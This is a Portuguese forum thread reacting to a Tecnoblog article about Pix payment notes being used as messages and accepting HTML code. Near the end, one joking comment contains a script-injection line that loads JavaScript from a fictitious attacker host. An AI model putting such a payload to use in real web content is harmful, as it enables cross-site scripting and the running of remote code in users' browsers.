Pix, usado também como app de mensagem, pode enviar código HTML

Originally published at: Pix, usado também como app de mensagem, pode enviar código HTML – Finanças – Tecnoblog

Banco Central faz nova exigência sobre anotações via Pix, mas ainda libera código HTML; recurso é usado por quem é “pixsexual”

Tecnoblog tinha que ter vergonha de dar atenção pra essa estupidez de qualquerb*sta-s*xual

3 curtidas

Essa estorinha da namorada parece conversa pra ganhar alguma fama, afinal SMS já existe a anos e não tem como bloquear, a criatura não pensou antes em enviar um SMS?!? (até tem com alguns apps, mas ai é outra conversa).

1 curtida

SMS tem como bloquear remetentes, mas concordo, mandar mensagens por pix esta mais para modinha passageira.

3 curtidas

Aproveitando o tema, é obrigatório um banco disponibilizar opção de criar chave Pix aleatória? Se for então é mais uma coisa que o Banco Neon está descumprindo, até hoje só tem opção de cadastrar celular, CPF e e-mail como chaves Pix no app deles

1 curtida

Isso simplesmente não é um problema. Troca de conteúdo em texto plano é uma realidade na tecnologia a DÉCADAS. O problema é a visão retrógrada de instituições de outra era tecnológica, incapazes de respeitar o espaço do usuário mediante qualquer sombra de problema. Repito: não é um problema.

1 curtida

O Neon permite criar chave aleatória, foi com uma dessas que eu fiz o teste. Só não sei se isso veio em uma atualização recente.

1 curtida

Deve ser recente, aqui nem aparece a opção

“pixsexuais” mundo :clown_face:

1 curtida

Pixsexual me parece basicamente uma forma de conseguir dinheiro, não uma orientação sexual.

2 curtidas

Você tinha que ter vergonha de dar atenção a esse tipo de coisa.

1 curtida

Eu não sei não, acho que muita gente não sabe que dá pra enviar SMS, pensam que SMS é tipo um canal para receber SPAM e mensagens de Banco, operadora etc.

1 curtida

That’s the joke.

1 curtida

a maioria dos celulares atuais ja tem opção de isolad os SMS indesejáveis! (deixando as mensagens isolados numa caixa de SPAM)

PixRomantico
PixPaquera
É novidade.

document.body.innerHTML = "<script src='meuamorfoiinvadido.com/carregar'></script>"
1 curtida

Este tópico foi automaticamente fechado após 92 dias. Novas respostas não são mais permitidas.